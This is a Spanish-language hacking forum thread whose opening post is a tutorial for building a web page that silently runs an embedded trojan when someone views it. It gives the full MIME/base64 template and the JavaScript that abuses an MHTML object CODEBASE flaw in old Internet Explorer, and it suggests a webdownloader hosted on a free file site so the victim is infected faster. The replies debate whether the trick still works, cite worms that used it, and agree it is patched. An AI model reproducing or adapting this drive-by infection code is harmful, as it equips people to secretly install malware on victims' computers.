Normas del foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Noviembre 23, 2008, 07:53:21
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Hack Novato  |  Troyanos y virus (Moderador: Angelus_7722)  |  Tema: creando pagina q al ser visualizada se ejecute un .exe (troyano) silenciosamente 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: creando pagina q al ser visualizada se ejecute un .exe (troyano) silenciosamente  (Leído 678 veces)
DarKnesS0xJhons(JMB)
daft punk
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 3792


Si Supieras La Mitad De Lo Que Se.... by JMB

jmb@el-hacker.org jmb@el-hacker.org
Ver Perfil WWW
« en: ſeptiembre 15, 2007, 06:53:40 »

Bueno, después de mucho intentos fallidos debo aceptar, afín pude crear una Pág. q al ser visualizada ejecute un .exe silenciosa mente, aquí dejo la demostración.

No voy a entrar en detalles de cada cosa, lastimosa mente a desaparecido la fuente q me inspiro para este post hace 3 años. Los cuadernos de Hackxcrack .

Primero descarguen este programa Decodificador Base64
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion

Con el pueden codificar cualquier archivo a Base64 y otros formatos, al igual q decodificarlos.

Una vez instalados le dan click derecho al archivo o server a codificar, yo usare el .exe de "telnet" ósea "telnet.exe" pero lo renombrare a IGNIZ.exe, luego les aparecerá mas opciones en pantalla.



Luego les parecerá una pantalla, le dan "OK" y en la siguiente pantalla podrán escoger el formato a codificar, nosotros usaremos MimeBase64



Una vez codificado aparecerá un .txt con el nombre del ejecutable codificado, en este caso "IGNIZ.txt"



Al abrir el .txt tenemos un ejecutable en base64.

Ahora lo mas importante, el código q permite toda la idea de este post.


Código:
MIME-Version: 1.0
Content-Location:file:///IGNIZ.exe
Content-Transfer-Encoding: base64

«Aqui toda la base64 del ejecutable sustituyendo esto»

[code]<title>IGNIZ</title>
<body bgcolor=black scroll=no>
<script>
function malicialocal()
{
var s=document.URL
var path=unescape(s.substr(-0,s.lastIndexOf("\\")));
var formato= '<body scroll=no bgcolor="black"><FONT face="Arial" color=orange>';
var imagen= '<img src="http://img112.exs.cx/img112/1441/firmalGNIZ2.jpg">';
var texto = '<b>  Pag malisiosa =)</b><br>';
var iframe1='<iframe src=http://www.google.com height=300 width=750></iframe>';
var iframe2='<iframe src=file://http://img112.exs.cx/img112/1441/firmalGNIZ2.jpg height=1 width=1></iframe>';
var objetoini='<object classid="clsid:66666666-6666-6666-6666" CODEBASE="mhtml:';
var objetofin='\\IGNIZ.html!file:///IGNIZ.exe"></object>';
var bugg = objetoini+path+objetofin
document.write (formato+imagen+texto+iframe1+iframe2+bugg);
}
setTimeout("malicialocal()",200);
</script>

Dejando los espacios respectivos, pegan el código donde indico y cambian los nombres q puse por los de sus archivos.

EJEMPLO:

Código:
var objetofin='\\IGNIZ.html!file:///IGNIZ.exe"></object>';
var objetofin='\\hackerss.html!file:///hackerss.exe"></object>';

Una vez terminados los cambios solo guardan la pag, en mi caso IGNIZ.html



Ahora al abrir la Pág. no abra problema alguno y se abrirá normalmente, obviamente esta pagina es de demostración y por lo tanto es algo simple, ustedes pueden diseñar algo mejor.



Segundos después de abierta la pagina, ejecutara el archivo oculto, como yo puse el "telnet.exe" para q fuera visible obviamente se abrirá, siendo un troyano o alguna otra cosa no habra problema y no se vera nada.



Extras:

Si usan ejecutables muy grandes el "block de notas" dirá q no tiene memoria, yo no tuve problemas pues el ejecutable q use solo pesa 76kb,si es mas grande usarían el "wordpad" al usarlo nunca les funciona correctamente pues el inserta líneas al guardar el archivo, descubrí q eso se soluciona simplemente cambiando el tipo de archivo, trae por defecto "Word para windows 6.0" solo lo cambian a "Documento de texto".



Así no tendrán problema alguno y funcionara perfectamente, se parece tonto pero por eso estuve un buen rato sin lograr nada....

Ahora q si desean hacer las cosas un poco mejor:

Dependiendo del tamaño del ejecutable eso tardara en infectar a la victima, q pasa si la victima cierra muy rápido la pagina? pues el troyano no logra ejecutarse, q puedo hacer con esto?.

Utilizar un Webdownloader (Imagino q ya saben q es por lo q no entrare en mayor detalle)
Ahora subimos nuestro ejecutable a una pagina web sin comprimir ni codificado, tiene q ser un .exe, q freehosting permite subir ejecutables de esta manera? NINGUNO luego de buscar por un buen tiempo encontré esta pagina q si permitirá subir todos nuestros ejecutables sin siquiera pedirnos registrar. =)


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.savefile.com


Ahora una vez q le damos "examinar" y buscamos nuestro server le damos "Abrir" y luego "Host File" con eso el server será subido a la pagina y se vera así.



La direccion q señale de blanco es la de su archivo, le deben dar click y les mostrara esta pantalla.



Le dan click derecho y luego propiedades donde dice "Download/show the hosted file" para ver la dirección exacta de su ejecutable, esa la copian y la pegan en su Webdownloader así.



Una vez listo crean el ejecutable, y empiezan de nuevo, lo codifican en base64 y lo pegan en la pag, lo mejor es q este ejecutable tan solo pesa 13kb's =) y su ejecución será en milésimas de segundo.

Espero q les sirva este pequeño manual, espero q se entienda pues lo intente escribir de una manera q yo hubiera entendido a la primera.

Tal vez el único inconveniente es encontrar en estos tiempos un hosting gratuito!! q no de problemas q interrumpan la función de la Pág.

creditos :www.hackerss.com

[/code]
« Última modificación: ſeptiembre 15, 2007, 06:58:53 por jmb » En línea





*Snake_Boy*
Miembro
*****
Desconectado Desconectado

Mensajes: 31



Ver Perfil
« Respuesta #1 en: ſeptiembre 15, 2007, 06:58:17 »

 Me interesa muchisimo pero no tienes algun manual para hacer la pag?

PD: Lo pido porque no se en q programacion sirva mejor

PD2: Todavia sirbe?
En línea
skydarck
Recien Llegado
*
Desconectado Desconectado

Mensajes: 3


Ver Perfil Email
« Respuesta #2 en: Diciembre 19, 2007, 01:23:13 »

wua interesante.. pero tengo problema no se si podras presentarlo en video para poder verlo muxo mejor,.. wueno espero tu respuesta.. y thankx estuvo buenisimo pero aun tengo errores no se ejecuta nada.. porfin encontre un manual acerca de esto porfavor responde a la peticion
En línea
3L_V13J0_S4B10
Miembro
*****
Desconectado Desconectado

Mensajes: 34


---->3L_V13J0_S4B10<----


Ver Perfil
« Respuesta #3 en: Diciembre 27, 2007, 09:57:16 »

jajajajaja la he probado en mas de 20 ocasiones, e visitado numerosas webs con esta misma informacion y todos absolutamente todos los usuarios no les funciona!!! es decir esto esto es una grandisima mentira q no funciona y nunka funcionara xq si no seria facilisimo infectar a todo el mundo no creen?? venga saludos y espero q qiten este tema xq no hace mas q engañar a novatos como yo y demas!! por cierto si me estoy eqivokando y si funciona ponme la pagina web para q acceda y asi veo si se abre telnet o no!!
En línea

PARA SEGUIR LA TRAYECTORIA: MIRA AL MAESTRO, SIGUE AL MAESTRO, CAMINA JUNTO AL MAESTRO, MIRA A TAVÉS DEL MAESTRO, CONVIERTETE EN EL MAESTRO!!!!!
ANYD00M
Moderación
Colaborador
*****
Desconectado Desconectado

Mensajes: 746


.:Beethoven's Count:.

maxigile_tl@hotmail.com
Ver Perfil WWW Email
« Respuesta #4 en: Enero 07, 2008, 03:40:18 »

jajajajaja la he probado en mas de 20 ocasiones, e visitado numerosas webs con esta misma informacion y todos absolutamente todos los usuarios no les funciona!!! es decir esto esto es una grandisima mentira q no funciona y nunka funcionara xq si no seria facilisimo infectar a todo el mundo no creen?? venga saludos y espero q qiten este tema xq no hace mas q engañar a novatos como yo y demas!! por cierto si me estoy eqivokando y si funciona ponme la pagina web para q acceda y asi veo si se abre telnet o no!!

No es asi, esta forma funciona, claro q ya debe haber un parche para esto, pero no es una gran mentira y repugna tu ignorancia, han existido worms que utilizaron esta tecnica para propagarce por correo electronico cuyo formato era en html (desde el outlook) y de esta forma el virus se ejecutaba ni vien se abria el mensaje sin necesidad de un adjunto o siquiera que el usuario tocara algo...
Para comprobarlo puedes ir a la pagina de Gedzac (en este momento estan reparandola) y descargar uno de los codes de MachineDramon (no recuerdo cual ^^) en donde utilizaba esto para propagarce usando un motor de codificacion a base64 propio del virus..
Tambien te puedes pasar por la pagina de George Guninski que ah encontrado, ya hace tiempo, muchos bugs relacionados...

En este momento no creo que sea posible hacerlo, pero tarde o temprano se mejorara esta tecnica recien mostrada (sobre todo sobre java) para lograr la autoejecucion... De todas formas este es uno de los temas a los que Microsoft le dio muchisima importancia y todabia se mantienen al tanto de todo lo relacionado con este tema.
« Última modificación: Enero 07, 2008, 03:42:53 por Ca$hFire » En línea


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
3L_V13J0_S4B10
Miembro
*****
Desconectado Desconectado

Mensajes: 34


---->3L_V13J0_S4B10<----


Ver Perfil
« Respuesta #5 en: Enero 07, 2008, 05:49:09 »

jajajajaja la he probado en mas de 20 ocasiones, e visitado numerosas webs con esta misma informacion y todos absolutamente todos los usuarios no les funciona!!! es decir esto esto es una grandisima mentira q no funciona y nunka funcionara xq si no seria facilisimo infectar a todo el mundo no creen?? venga saludos y espero q qiten este tema xq no hace mas q engañar a novatos como yo y demas!! por cierto si me estoy eqivokando y si funciona ponme la pagina web para q acceda y asi veo si se abre telnet o no!!

No es asi, esta forma funciona, claro q ya debe haber un parche para esto, pero no es una gran mentira y repugna tu ignorancia, han existido worms que utilizaron esta tecnica para propagarce por correo electronico cuyo formato era en html (desde el outlook) y de esta forma el virus se ejecutaba ni vien se abria el mensaje sin necesidad de un adjunto o siquiera que el usuario tocara algo...
Para comprobarlo puedes ir a la pagina de Gedzac (en este momento estan reparandola) y descargar uno de los codes de MachineDramon (no recuerdo cual ^^) en donde utilizaba esto para propagarce usando un motor de codificacion a base64 propio del virus..
Tambien te puedes pasar por la pagina de George Guninski que ah encontrado, ya hace tiempo, muchos bugs relacionados...

En este momento no creo que sea posible hacerlo, pero tarde o temprano se mejorara esta tecnica recien mostrada (sobre todo sobre java) para lograr la autoejecucion... De todas formas este es uno de los temas a los que Microsoft le dio muchisima importancia y todabia se mantienen al tanto de todo lo relacionado con este tema.

ok men, toda tu teoria  puede ser verdadera pero sigo sin creermelo!! asta q me lo demuestre alguien!! Saludos!!
En línea

PARA SEGUIR LA TRAYECTORIA: MIRA AL MAESTRO, SIGUE AL MAESTRO, CAMINA JUNTO AL MAESTRO, MIRA A TAVÉS DEL MAESTRO, CONVIERTETE EN EL MAESTRO!!!!!
SkullMaster123
Visitante
« Respuesta #6 en: Enero 07, 2008, 05:54:56 »

pues muy interesante de verdad que habia escuchado de esto mas nunca lo habia visto.
muy buen aporte muy util! Wink

Salu2's! Cool
En línea
ANYD00M
Moderación
Colaborador
*****
Desconectado Desconectado

Mensajes: 746


.:Beethoven's Count:.

maxigile_tl@hotmail.com
Ver Perfil WWW Email
« Respuesta #7 en: Enero 07, 2008, 06:04:54 »

jajajajaja la he probado en mas de 20 ocasiones, e visitado numerosas webs con esta misma informacion y todos absolutamente todos los usuarios no les funciona!!! es decir esto esto es una grandisima mentira q no funciona y nunka funcionara xq si no seria facilisimo infectar a todo el mundo no creen?? venga saludos y espero q qiten este tema xq no hace mas q engañar a novatos como yo y demas!! por cierto si me estoy eqivokando y si funciona ponme la pagina web para q acceda y asi veo si se abre telnet o no!!

No es asi, esta forma funciona, claro q ya debe haber un parche para esto, pero no es una gran mentira y repugna tu ignorancia, han existido worms que utilizaron esta tecnica para propagarce por correo electronico cuyo formato era en html (desde el outlook) y de esta forma el virus se ejecutaba ni vien se abria el mensaje sin necesidad de un adjunto o siquiera que el usuario tocara algo...
Para comprobarlo puedes ir a la pagina de Gedzac (en este momento estan reparandola) y descargar uno de los codes de MachineDramon (no recuerdo cual ^^) en donde utilizaba esto para propagarce usando un motor de codificacion a base64 propio del virus..
Tambien te puedes pasar por la pagina de George Guninski que ah encontrado, ya hace tiempo, muchos bugs relacionados...

En este momento no creo que sea posible hacerlo, pero tarde o temprano se mejorara esta tecnica recien mostrada (sobre todo sobre java) para lograr la autoejecucion... De todas formas este es uno de los temas a los que Microsoft le dio muchisima importancia y todabia se mantienen al tanto de todo lo relacionado con este tema.

ok men, toda tu teoria  puede ser verdadera pero sigo sin creermelo!! asta q me lo demuestre alguien!! Saludos!!

La verdad yo creo que te falta buscar, busca en google y veras que si es verdad...
Yo creo que antes de postear y antes de acusar al usuario que creo el tread de mentiroso deberias buscar, y buscar bien.
Si leer el script que dejo JMB podras observar que lo que hace es crear el archivo a travez del codigo encriptado en la cabezera MIME...
Ademas como quieres que alguien te lo demuestre si claro a quedado que es un bug que fue parcheado, claro qu se podria investigar y buscar una manera de saltar el activeX y la seguridad que ah puesto Internet Explorer a esto; pero no va al caso. Este bug se utilizo mas o menos por el 2003 si no me equivoco y por lo que dices seguro no buscaste sobre el tema, ya que me pareceria algo extraño que las empresas AntiVirus tambien mientan e inventen virus que no existen ¿no crees? :
El virus de MachineDramon fue el Gaggle con 3 variantes creo, este virus se propaga en formato html, utilizando este tecnica.

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion

Lo que yo dije no es teoria, ni es mi teoria, son los hechos, es un bug que se descubrio se demostro y se uso. Y tu ignorancia no muestra mas que la falta de informacion que posees o que no quieres poseer ya que no te dedicas a buscar.
« Última modificación: Enero 07, 2008, 06:12:26 por Ca$hFire » En línea


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
DarKnesS0xJhons(JMB)
daft punk
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 3792


Si Supieras La Mitad De Lo Que Se.... by JMB

jmb@el-hacker.org jmb@el-hacker.org
Ver Perfil WWW
« Respuesta #8 en: Enero 08, 2008, 04:24:21 »

jajajajaja la he probado en mas de 20 ocasiones, e visitado numerosas webs con esta misma informacion y todos absolutamente todos los usuarios no les funciona!!! es decir esto esto es una grandisima mentira q no funciona y nunka funcionara xq si no seria facilisimo infectar a todo el mundo no creen?? venga saludos y espero q qiten este tema xq no hace mas q engañar a novatos como yo y demas!! por cierto si me estoy eqivokando y si funciona ponme la pagina web para q acceda y asi veo si se abre telnet o no!!

No es asi, esta forma funciona, claro q ya debe haber un parche para esto, pero no es una gran mentira y repugna tu ignorancia, han existido worms que utilizaron esta tecnica para propagarce por correo electronico cuyo formato era en html (desde el outlook) y de esta forma el virus se ejecutaba ni vien se abria el mensaje sin necesidad de un adjunto o siquiera que el usuario tocara algo...
Para comprobarlo puedes ir a la pagina de Gedzac (en este momento estan reparandola) y descargar uno de los codes de MachineDramon (no recuerdo cual ^^) en donde utilizaba esto para propagarce usando un motor de codificacion a base64 propio del virus..
Tambien te puedes pasar por la pagina de George Guninski que ah encontrado, ya hace tiempo, muchos bugs relacionados...

En este momento no creo que sea posible hacerlo, pero tarde o temprano se mejorara esta tecnica recien mostrada (sobre todo sobre java) para lograr la autoejecucion... De todas formas este es uno de los temas a los que Microsoft le dio muchisima importancia y todabia se mantienen al tanto de todo lo relacionado con este tema.

ok men, toda tu teoria  puede ser verdadera pero sigo sin creermelo!! asta q me lo demuestre alguien!! Saludos!!

La verdad yo creo que te falta buscar, busca en google y veras que si es verdad...
Yo creo que antes de postear y antes de acusar al usuario que creo el tread de mentiroso deberias buscar, y buscar bien.
Si leer el script que dejo JMB podras observar que lo que hace es crear el archivo a travez del codigo encriptado en la cabezera MIME...
Ademas como quieres que alguien te lo demuestre si claro a quedado que es un bug que fue parcheado, claro qu se podria investigar y buscar una manera de saltar el activeX y la seguridad que ah puesto Internet Explorer a esto; pero no va al caso. Este bug se utilizo mas o menos por el 2003 si no me equivoco y por lo que dices seguro no buscaste sobre el tema, ya que me pareceria algo extraño que las empresas AntiVirus tambien mientan e inventen virus que no existen ¿no crees? :
El virus de MachineDramon fue el Gaggle con 3 variantes creo, este virus se propaga en formato html, utilizando este tecnica.

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion

Lo que yo dije no es teoria, ni es mi teoria, son los hechos, es un bug que se descubrio se demostro y se uso. Y tu ignorancia no muestra mas que la falta de informacion que posees o que no quieres poseer ya que no te dedicas a buscar.
claro que esto funciono  pero como dices ya no desafurtunadamente
haci que buscar antes de hablar
saludos
En línea





ferisi
Habitual
*****
Desconectado Desconectado

Mensajes: 206



Ver Perfil
« Respuesta #9 en: Enero 11, 2008, 09:48:22 »

Ante toda esta polemica, suponiendo que funcione ahora en alguna maquina sinparchear y demas, mi pregunta es otra.
¿Si tienes un firewall instalado, no te avisara cuando intente descargarse?

un saludo
En línea


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
ANYD00M
Moderación
Colaborador
*****
Desconectado Desconectado

Mensajes: 746


.:Beethoven's Count:.

maxigile_tl@hotmail.com
Ver Perfil WWW Email
« Respuesta #10 en: Enero 12, 2008, 10:21:59 »

Ante toda esta polemica, suponiendo que funcione ahora en alguna maquina sinparchear y demas, mi pregunta es otra.
¿Si tienes un firewall instalado, no te avisara cuando intente descargarse?

un saludo

En la actualidad, esta claro que si
En línea


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Hack Novato  |  Troyanos y virus (Moderador: Angelus_7722)  |  Tema: creando pagina q al ser visualizada se ejecute un .exe (troyano) silenciosamente « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.7 | SMF © 2006-2007, Simple Machines LLC